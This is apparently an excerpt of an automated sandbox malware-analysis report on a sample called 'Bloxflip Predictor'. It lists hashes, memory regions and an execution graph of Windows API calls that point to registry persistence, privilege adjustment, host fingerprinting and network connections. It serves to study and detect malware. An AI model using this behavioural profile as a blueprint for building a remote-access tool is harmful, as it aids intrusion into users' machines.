                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: eff56a2c2142db1134403a3ec824cc6ebb1525b113ab21d5a0d6177a46e9e968
                                            • Instruction ID: c4ecdb152753baae03b41b1db9a68a087e744a7e3db40eecd9df6dfc48a4774b
                                            • Opcode Fuzzy Hash: eff56a2c2142db1134403a3ec824cc6ebb1525b113ab21d5a0d6177a46e9e968
                                            • Instruction Fuzzy Hash: C61165B1409384AFDB228B15DC44B62BFB4DF46725F0880DAED898B253D275A908CB72
                                            APIs
                                            • ShellExecuteExW.SHELL32(?), ref: 00BFB4C0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID:
                                            • API String ID: 587946157-0
                                            • Opcode ID: fb15439663d6b2078b956131029cec93abd34fea3c2a692f9421972af0d8b323
                                            • Instruction ID: eb955a27e65feead45dbef44ad553232a17b19c1f34170ac7bc277587c6fb7d7
                                            • Opcode Fuzzy Hash: fb15439663d6b2078b956131029cec93abd34fea3c2a692f9421972af0d8b323
                                            • Instruction Fuzzy Hash: 57016D716002488FDB10CF2AD985B66BBE8DF15320F08C4AADE09CB742D778E8088A61
                                            APIs
                                            • WaitForInputIdle.USER32(?,?), ref: 00BFB6AF
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: IdleInputWait
                                            • String ID:
                                            • API String ID: 2200289081-0
                                            • Opcode ID: 96c0dc8ade71d11c49199b8f6c704a73dce17c8e88ba74e953d5a17b6d91f8d0
                                            • Instruction ID: 2dbe8236c3d722f3cc9e092bb8039061c02765e6a98c1d6215b8d36c15cb5a6e
                                            • Opcode Fuzzy Hash: 96c0dc8ade71d11c49199b8f6c704a73dce17c8e88ba74e953d5a17b6d91f8d0
                                            • Instruction Fuzzy Hash: FF018F71904248AFDB20CF15D984B65FBE4EF15325F18C4EADE498F252D375E408CBA2
                                            APIs
                                            • SetErrorMode.KERNELBASE(?), ref: 00BFAB50
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 3ea0a523769d836003748d25fc27eb5f772505b02269cc62c2e28d99233a90b1
                                            • Instruction ID: 55d1cafcb908de09b636454ba24546d985fb0ae14acbda6721e3eddfed89a467
                                            • Opcode Fuzzy Hash: 3ea0a523769d836003748d25fc27eb5f772505b02269cc62c2e28d99233a90b1
                                            • Instruction Fuzzy Hash: FCF0A9B59042489FDB208F05D885B61FBE4EF15325F18C0DADE0D4B752D2B9E808CAA2
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 00BFA290
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: b9f7d9e87728e7ed57d4256ce2ba887fe9151bd6fbf6dd6f625b1486ec5dc40e
                                            • Instruction ID: 7395895169241bb683ce2b45526e1c62b5dcdafbb9ebbc7548f07f2f3f9089d4
                                            • Opcode Fuzzy Hash: b9f7d9e87728e7ed57d4256ce2ba887fe9151bd6fbf6dd6f625b1486ec5dc40e
                                            • Instruction Fuzzy Hash: 5411A7B15093849FDB128B25DC94B52BFB4DF46320F0884DBED498F652D275A808CB62
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 00BFA290
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: f4a1934a2d6865f3dd656a935f55f1408185c0cf690027e89a1603aea0998feb
                                            • Instruction ID: ad851fbaad80aefc685c42a4b2c2b9514f3f480bafbe1e182a952325ae7eab6b
                                            • Opcode Fuzzy Hash: f4a1934a2d6865f3dd656a935f55f1408185c0cf690027e89a1603aea0998feb
                                            • Instruction Fuzzy Hash: A301B1B16052448FDB148F55D885765FBD4DF15320F08C4EADD098B652D275E408CA62
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0e83d2e150e8434de6b7d17c31e41317772e50ae357ec28d1edd8af1aeb2412
                                            • Instruction ID: 755ead231c53be149ad3d8fa7d1c48a2691f86938a0044599d6bae268e8c8b54
                                            • Opcode Fuzzy Hash: e0e83d2e150e8434de6b7d17c31e41317772e50ae357ec28d1edd8af1aeb2412
                                            • Instruction Fuzzy Hash: 68F11530A00218CFDB24EB34D951BAD77B2FF89308F1045A9D90AAB7A9DB355D81CF61
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 379cd4a190a50a32828ce639074ff94c33cc3903d06abca0bedc7dc875defd18
                                            • Instruction ID: 70f390d44a2bc228ca97b464815dd5c2e5d9f482c75c03c1c7dddcc720c58e4d
                                            • Opcode Fuzzy Hash: 379cd4a190a50a32828ce639074ff94c33cc3903d06abca0bedc7dc875defd18
                                            • Instruction Fuzzy Hash: B0E12830A00318CFDB15EF78D981BADB7B2EF89308F1045A9D4056B7A9DB359946CF60
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d10af5418d32d5102f251afdef33299c1a1d3cac20487ee8292fb6dbfcac9194
                                            • Instruction ID: 7d278d9d3a89dd461902fbd63b13cf9d2f31b338db4180de2fe52641cc66fc42
                                            • Opcode Fuzzy Hash: d10af5418d32d5102f251afdef33299c1a1d3cac20487ee8292fb6dbfcac9194
                                            • Instruction Fuzzy Hash: 8FE10634A00219CFDB24EF34D951BAD77B2FB89308F1045A9D90A9B7A9DB359D81CF60
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce4b3fcda4a3002b10e2cfaec96586f6d9d5d6177d21b1048445e428e1e711dd
                                            • Instruction ID: a39ac7bedbdd26f91f6d73a568be224d61d9ef38f517e671694397e56f71b0fd
                                            • Opcode Fuzzy Hash: ce4b3fcda4a3002b10e2cfaec96586f6d9d5d6177d21b1048445e428e1e711dd
                                            • Instruction Fuzzy Hash: 16A11630A00219CFEB15EF74D991BADB7B2EB85308F1044A9D5066B7A9DB359D82CF60
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3879da3e1e0a5ff81aea1d15a6ecffbee8d325399186f0a60ca1679217beb3a1
                                            • Instruction ID: 1d5357df43c489dc875afab69f7de1caf1f6103a84594cc54926458cbd109ab6
                                            • Opcode Fuzzy Hash: 3879da3e1e0a5ff81aea1d15a6ecffbee8d325399186f0a60ca1679217beb3a1
                                            • Instruction Fuzzy Hash: AD813630116381CFC705EF38E6519997BF2EF9220CB15899DD0458FA6EDB34990ACBB1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145042656.0000000000FF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_ff0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba62d402eef9cca798c60462c43938124daa7e63edb672e022d3ed564827296c
                                            • Instruction ID: 0c92d98d8ea10b6b344932a677c889c07abb9ee4b90f7ab2a06937c8f01a0e51
                                            • Opcode Fuzzy Hash: ba62d402eef9cca798c60462c43938124daa7e63edb672e022d3ed564827296c
                                            • Instruction Fuzzy Hash: B901D6B650E7806FD7128B159C40862FFB8EF86630709C4DFEC898B652D129A909CB72
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145042656.0000000000FF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_ff0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 50773ab865c18f9b72f8a5f753875d58c4ebb9e73f1e24ed8ace573029e0413d
                                            • Instruction ID: fe22bda2c234edbd51f08d88006b39e296ff0581ab34533ee9bef62c2cb0dded
                                            • Opcode Fuzzy Hash: 50773ab865c18f9b72f8a5f753875d58c4ebb9e73f1e24ed8ace573029e0413d
                                            • Instruction Fuzzy Hash: 19E092B66016004B9750CF0AEC41452F7D8EB84631708C47FDC0D8B701D639B508CAA5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143861280.0000000000BF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bf2000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 587f4d76bc4e95ff84e9701ee7d8fe2f07d1a81d1fd241fa04a30854e40594ed
                                            • Instruction ID: f9038f80dea991174445e703a6105ab8c2324c9460e9cd263cb8fac22e24e4e1
                                            • Opcode Fuzzy Hash: 587f4d76bc4e95ff84e9701ee7d8fe2f07d1a81d1fd241fa04a30854e40594ed
                                            • Instruction Fuzzy Hash: 38D05E792056C14FD3179B1CC1A9BA937D4AB61714F4A44FAA9008B763C7A8D985D610
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143861280.0000000000BF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bf2000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 857784f115e88e2747edb077320b55733747d615b75ae608732bd21c083db2db
                                            • Instruction ID: f992fe3d7e94511a8267c1c7b15a9ff3abc2fd894b9dc8d3498e607e9261d6b2
                                            • Opcode Fuzzy Hash: 857784f115e88e2747edb077320b55733747d615b75ae608732bd21c083db2db
                                            • Instruction Fuzzy Hash: 02D05E742006854FC715DB0CC6D4F6937D4AB50B14F0644E8AC108B762C7B8D8C9CA00
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2092936dbf62254988bbab373aa57b69bedfe05f03e45f3094b29dca96e0c0d0
                                            • Instruction ID: 36020b178890b17c6f99aca4687a0c996c8272fbbd63b0a88b2d661fc2f65448
                                            • Opcode Fuzzy Hash: 2092936dbf62254988bbab373aa57b69bedfe05f03e45f3094b29dca96e0c0d0
                                            • Instruction Fuzzy Hash: 5CC02B36B001358B8F0037F974053DCF314DED402D704002AC118820008F34C11547F3

                                            Execution Graph

                                            Execution Coverage:18%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.8%
                                            Total number of Nodes:168
                                            Total number of Limit Nodes:6
                                            execution_graph 6437 11bb09a 6439 11bb0d5 SendMessageTimeoutA 6437->6439 6440 11bb11d 6439->6440 6441 11ba09a 6442 11ba0cf send 6441->6442 6443 11ba107 6441->6443 6444 11ba0dd 6442->6444 6443->6442 6445 5ee3dea 6446 5ee3e13 select 6445->6446 6448 5ee3e48 6446->6448 6449 11bab1e 6450 11bab4a SetErrorMode 6449->6450 6451 11bab73 6449->6451 6452 11bab5f 6450->6452 6451->6450 6453 11bb19e 6455 11bb1c7 CopyFileW 6453->6455 6456 11bb1ee 6455->6456 6457 5ee28e6 6458 5ee291b WSAConnect 6457->6458 6460 5ee293a 6458->6460 6461 5ee3b66 6463 5ee3b9b CertVerifyCertificateChainPolicy 6461->6463 6464 5ee3bca 6463->6464 6465 11baf92 6466 11bafca RegOpenKeyExW 6465->6466 6468 11bb020 6466->6468 6469 5ee01e2 6470 5ee021d LoadLibraryA 6469->6470 6472 5ee025a 6470->6472 6473 5ee3f7a 6474 5ee3fb8 DuplicateHandle 6473->6474 6475 5ee3ff0 6473->6475 6476 5ee3fc6 6474->6476 6475->6474 6477 5ee48f6 6478 5ee492e RegCreateKeyExW 6477->6478 6480 5ee49a0 6478->6480 6481 5ee4c76 6482 5ee4cab GetProcessWorkingSetSize 6481->6482 6484 5ee4cd7 6482->6484 6485 5ee1af2 6486 5ee1b27 WSAEventSelect 6485->6486 6488 5ee1b5e 6486->6488 6493 5ee174a 6494 5ee177f GetProcessTimes 6493->6494 6496 5ee17b1 6494->6496 6497 5ee08c6 6500 5ee08fb ReadFile 6497->6500 6499 5ee092d 6500->6499 6505 11babb2 6506 11babe7 RegQueryValueExW 6505->6506 6508 11bac3b 6506->6508 6513 5ee0b42 6514 5ee0b92 RasEnumConnectionsW 6513->6514 6515 5ee0ba0 6514->6515 6516 5ee11de 6517 5ee1216 MapViewOfFile 6516->6517 6519 5ee1265 6517->6519 6520 11ba4aa 6521 11ba50c 6520->6521 6522 11ba4d6 OleInitialize 6520->6522 6521->6522 6523 11ba4e4 6522->6523 6524 5ee4d5a 6526 5ee4d8f SetProcessWorkingSetSize 6524->6526 6527 5ee4dbb 6526->6527 6528 5ee1bd6 6530 5ee1c0b RasConnectionNotificationW 6528->6530 6531 5ee1c3e 6530->6531 6532 11baca6 6533 11bacdb RegSetValueExW 6532->6533 6535 11bad27 6533->6535 6536 5ee2b2e 6538 5ee2b5d AdjustTokenPrivileges 6536->6538 6539 5ee2b7f 6538->6539 6540 5ee102e 6542 5ee1066 ConvertStringSecurityDescriptorToSecurityDescriptorW 6540->6542 6543 5ee10a7 6542->6543 6544 5ee2caa 6546 5ee2cdf K32EnumProcessModules 6544->6546 6547 5ee2d0e 6546->6547 6548 11ba25e 6549 11ba28a CloseHandle 6548->6549 6550 11ba2c9 6548->6550 6551 11ba298 6549->6551 6550->6549 6552 5ee1ea6 6553 5ee1edb RegNotifyChangeKeyValue 6552->6553 6555 5ee1f18 6553->6555 6556 5ee1ca2 6558 5ee1cda RegOpenCurrentUser 6556->6558 6559 5ee1d0d 6558->6559 6560 11ba54e 6561 11ba583 GetTokenInformation 6560->6561 6563 11ba5c0 6561->6563 6564 5ee1836 6566 5ee186b ioctlsocket 6564->6566 6567 5ee1897 6566->6567 6568 5ee2632 6570 5ee266d getaddrinfo 6568->6570 6571 5ee26df 6570->6571 6572 11bb57e 6573 11bb5ad WaitForInputIdle 6572->6573 6574 11bb5e3 6572->6574 6575 11bb5bb 6573->6575 6574->6573 6576 5ee0606 6577 5ee063b GetFileType 6576->6577 6579 5ee0668 6577->6579 6580 12d1b41 6581 12d17ea 6580->6581 6586 12d1c5e 6581->6586 6591 12d1b90 6581->6591 6596 12d1c31 6581->6596 6601 12d1bf9 6581->6601 6587 12d1c67 6586->6587 6588 12d1d41 6587->6588 6606 12d2098 6587->6606 6610 12d2087 6587->6610 6588->6588 6592 12d1b94 6591->6592 6593 12d1d41 6592->6593 6594 12d2098 2 API calls 6592->6594 6595 12d2087 2 API calls 6592->6595 6594->6593 6595->6593 6597 12d1c3a 6596->6597 6598 12d1d41 6597->6598 6599 12d2098 2 API calls 6597->6599 6600 12d2087 2 API calls 6597->6600 6598->6598 6599->6598 6600->6598 6602 12d1c02 6601->6602 6603 12d1d41 6602->6603 6604 12d2098 2 API calls 6602->6604 6605 12d2087 2 API calls 6602->6605 6603->6603 6604->6603 6605->6603 6607 12d20c3 6606->6607 6608 12d210c 6607->6608 6614 12d28d7 6607->6614 6608->6588 6611 12d2098 6610->6611 6612 12d210c 6611->6612 6613 12d28d7 2 API calls 6611->6613 6612->6588 6613->6612 6615 12d28e0 6614->6615 6619 5ee1a4a 6615->6619 6622 5ee19d7 6615->6622 6616 12d294a 6616->6608 6620 5ee1a9a GetVolumeInformationA 6619->6620 6621 5ee1aa2 6620->6621 6621->6616 6623 5ee1a18 GetVolumeInformationA 6622->6623 6625 5ee1aa2 6623->6625 6625->6616 6626 5ee1482 6628 5ee14b7 shutdown 6626->6628 6629 5ee14e0 6628->6629 6630 5ee0c02 6632 5ee0c3a WSASocketW 6630->6632 6633 5ee0c76 6632->6633 6634 5ee239a 6635 5ee23cf GetNetworkParams 6634->6635 6637 5ee23ff 6635->6637 6638 5ee4b9a 6641 5ee4bcf GetExitCodeProcess 6638->6641 6640 5ee4bf8 6641->6640 6642 5ee2d92 6643 5ee2dc7 K32GetModuleInformation 6642->6643 6645 5ee2dfe 6643->6645 6654 5ee1912 6657 5ee1947 WSAIoctl 6654->6657 6656 5ee1995 6657->6656 6658 5ee2812 6660 5ee2847 GetAdaptersAddresses 6658->6660 6661 5ee2880 6660->6661 6662 11bae66 6663 11bae9e CreateMutexW 6662->6663 6665 11baee1 6663->6665 6666 11bb266 6669 11bb29e CreateFileW 6666->6669 6668 11bb2ed 6669->6668
                                            APIs
                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05EE2B77
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: AdjustPrivilegesToken
                                            • String ID:
                                            • API String ID: 2874748243-0
                                            • Opcode ID: e638a05399a0063b87e80fb8ac6691521fce80888832aebcd5cf380d43649dc7
                                            • Instruction ID: 9a62fdb417339a3fe767749c00775fffc5c2791d35941d4604a2d48f16413b52
                                            • Opcode Fuzzy Hash: e638a05399a0063b87e80fb8ac6691521fce80888832aebcd5cf380d43649dc7
                                            • Instruction Fuzzy Hash: E1218D755097849FEB228F25DC44B52BFB8BF06214F0884DAE9858B563D271A908CB62
                                            APIs
                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05EE2B77
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: AdjustPrivilegesToken
                                            • String ID:
                                            • API String ID: 2874748243-0
                                            • Opcode ID: 38b9351c0241ac6df0c9d3c86604b1bb8679b98a84b719440cfe01c9306a88a7
                                            • Instruction ID: a870977de2fe52c918c9c49a854f51471d78908e3c98c68277f69c7ed8999903
                                            • Opcode Fuzzy Hash: 38b9351c0241ac6df0c9d3c86604b1bb8679b98a84b719440cfe01c9306a88a7
                                            • Instruction Fuzzy Hash: 511170755106049FEB20CF55D844B66FBE9FF04224F08C4AAEE8A8B652E371E418CF71
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ff5b0da4274471446c909076c3b1df566a54d2a6607f68bb037ba9a8d35ca3ed
                                            • Instruction ID: 1a5ec33e19be5801e2f0b9700248960607da89b187b3987030a20107520fe53e
                                            • Opcode Fuzzy Hash: ff5b0da4274471446c909076c3b1df566a54d2a6607f68bb037ba9a8d35ca3ed
                                            • Instruction Fuzzy Hash: 5151D331B00205ABDB18DB75AC19BAE36A3ABE5358F1445389115DB3E4DE39AC06C7A1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd67412700c3efaa6e7aab1c60753239ad920f97a46ca421ca114b3d65e63c9e
                                            • Instruction ID: d80b18e4eab023d79e2db20f31737ea7b399b3ee5897e090a39136d447f7de9e
                                            • Opcode Fuzzy Hash: fd67412700c3efaa6e7aab1c60753239ad920f97a46ca421ca114b3d65e63c9e
                                            • Instruction Fuzzy Hash: 9D51E531700205ABDF18DB79AC19BAE36A7DBE5344F144538D115DB3E4DE39AC05C7A1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 11baf30-11bafed 5 11bafef 0->5 6 11baff2-11bb009 0->6 5->6 8 11bb04b-11bb050 6->8 9 11bb00b-11bb01e RegOpenKeyExW 6->9 8->9 10 11bb052-11bb057 9->10 11 11bb020-11bb048 9->11 10->11
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 011BB011
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: ac2970658534813a7305fd02efbc8afceccf6a16abe1d202993740097db875b3
                                            • Instruction ID: 718954af017d250a9950b624bdf34f486a61bc35e7dcac10239b8b4d0197c959
                                            • Opcode Fuzzy Hash: ac2970658534813a7305fd02efbc8afceccf6a16abe1d202993740097db875b3
                                            • Instruction Fuzzy Hash: 4541B5B14097806FE7138B649C45BA6BFB8EF16314F0985DAE9848B5A3D224990AC771

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 16 5ee25ff-5ee26cf 22 5ee2721-5ee2726 16->22 23 5ee26d1-5ee26d9 getaddrinfo 16->23 22->23 24 5ee26df-5ee26f1 23->24 26 5ee2728-5ee272d 24->26 27 5ee26f3-5ee271e 24->27 26->27
                                            APIs
                                            • getaddrinfo.WS2_32(?,00000E24), ref: 05EE26D7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: getaddrinfo
                                            • String ID:
                                            • API String ID: 300660673-0
                                            • Opcode ID: a142c80b4f89f0bdbe0e238a0d482383de99f7b5ea555276a490ebd3c55cc1da
                                            • Instruction ID: d45b619984d9af0d57940b4ac80a9fe0958f27d17d9f63b70e971663c1b6fc42
                                            • Opcode Fuzzy Hash: a142c80b4f89f0bdbe0e238a0d482383de99f7b5ea555276a490ebd3c55cc1da
                                            • Instruction Fuzzy Hash: D431A3B2504344AFE7228F60CC44FA6BBECEF05314F14449AFA849B292D375A949CB71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 31 5ee1d5a-5ee1ded 36 5ee1def 31->36 37 5ee1df2-5ee1e09 31->37 36->37 39 5ee1e0b-5ee1e13 RegOpenKeyExW 37->39 40 5ee1e58-5ee1e5d 37->40 41 5ee1e19-5ee1e2b 39->41 40->39 43 5ee1e5f-5ee1e64 41->43 44 5ee1e2d-5ee1e55 41->44 43->44
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05EE1E11
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 9a275f615fafba55b4ade19bc7dc56e23cf667adee6596deac5d32d37ba2393a
                                            • Instruction ID: 81b5be215726e83ab397b71aa1939060a154fc6118fbe77ecfe3db201247984a
                                            • Opcode Fuzzy Hash: 9a275f615fafba55b4ade19bc7dc56e23cf667adee6596deac5d32d37ba2393a
                                            • Instruction Fuzzy Hash: 2131CFB2404344AFE7228F20DC44FA7BBACEF55314F04889AE9858B252E374E509CBB1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 48 5ee48ca-5ee494e 52 5ee4953-5ee495f 48->52 53 5ee4950 48->53 54 5ee4964-5ee496d 52->54 55 5ee4961 52->55 53->52 56 5ee496f 54->56 57 5ee4972-5ee4989 54->57 55->54 56->57 59 5ee49cb-5ee49d0 57->59 60 5ee498b-5ee499e RegCreateKeyExW 57->60 59->60 61 5ee49d2-5ee49d7 60->61 62 5ee49a0-5ee49c8 60->62 61->62
                                            APIs
                                            • RegCreateKeyExW.KERNEL32(?,00000E24), ref: 05EE4991
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 0e16c7e1aca64d17d0bfe6e52befead5ac77bfdbce49008d07ed6b93c0cf2869
                                            • Instruction ID: e2a4c9b99630a47302bff8c22453123ab48227e111c5b7b41f9411a0c7558f47
                                            • Opcode Fuzzy Hash: 0e16c7e1aca64d17d0bfe6e52befead5ac77bfdbce49008d07ed6b93c0cf2869
                                            • Instruction Fuzzy Hash: 8D31AF72104345AFEB228B21CC44FA7BBECEF19214F08859AE9859B652D325E908CB61

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 94 5ee19d7-5ee1a9c GetVolumeInformationA 98 5ee1aa2-5ee1acb 94->98
                                            APIs
                                            • GetVolumeInformationA.KERNEL32(?,00000E24,?,?), ref: 05EE1A9A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationVolume
                                            • String ID:
                                            • API String ID: 2039140958-0
                                            • Opcode ID: 7e51500f508b3730f8d900df7c0403e1f0a4e91fd473a374cb09d9e9a7821e41
                                            • Instruction ID: 699aa47e5ed802ecd72fe47e6695cf6572cb383c997603411d0377a6da4a53c2
                                            • Opcode Fuzzy Hash: 7e51500f508b3730f8d900df7c0403e1f0a4e91fd473a374cb09d9e9a7821e41
                                            • Instruction Fuzzy Hash: 2731907154D3C45FD3038B358C61AA2BFB4EF47614F0A84CBD9848F2A3D624A91AD7B2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
